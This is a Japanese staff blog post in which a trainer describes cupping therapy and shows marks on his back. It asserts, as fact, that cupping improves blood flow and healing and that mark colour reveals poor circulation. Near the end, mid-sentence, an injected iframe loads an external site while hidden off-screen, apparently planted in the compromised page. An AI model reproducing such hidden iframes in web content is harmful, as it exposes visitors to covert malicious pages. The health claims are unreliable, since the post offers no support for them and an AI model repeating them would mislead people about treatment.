スタッフブログ Staff Blog

吸玉

こんばんはビーグラン トレーナーの高橋涼です!

先日、吸玉での施術を希望された方がいました。

吸玉とは、専用の道具を使用し不調のある部分を吸い上げることで血管が一時的に縮小し、放すことで血管が拡張し血流が良くなるのを狙っています。血流が良くなれば、痛み、凝りなどが、緩和し、体内の新陳代謝も促進され、自然治療力が働きます。
吸玉の吸引刺激は、押すよりも引く「陰圧」の方が強く、術後も心地よいものです。吸玉の術後で体がだるくなったりする場合は、血の流れが促進され効果がでている状態といえます。
他の治療法が体表から体内に向かって刺激を加えていきますが、唯一、吸い玉療法のみが 体表から外に向かって皮膚・脂肪・筋肉を吸い上げます。

画像は吸玉をした後の私の背中です。
見てわかるように左上の部分だけ赤紫色になっています。ここが一番血流が悪く不調な箇所で、このようにわかりやすく色となって出てくるのが特徴です!

img src=”cid:F96252FD-5E8B-459D-9E93-4BE45126432D” alt=”image1.JPG” id=”F96252FD-5E8B-459D-9E93-4BE45126432D”

吸玉はハマるファンがいたり、アスリートでも個人で購入し、持っている人がいるほどの!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe

コメントを投稿する
※承認されるまではコメントは表示されません。

CAPTCHA


ページ上部へ戻る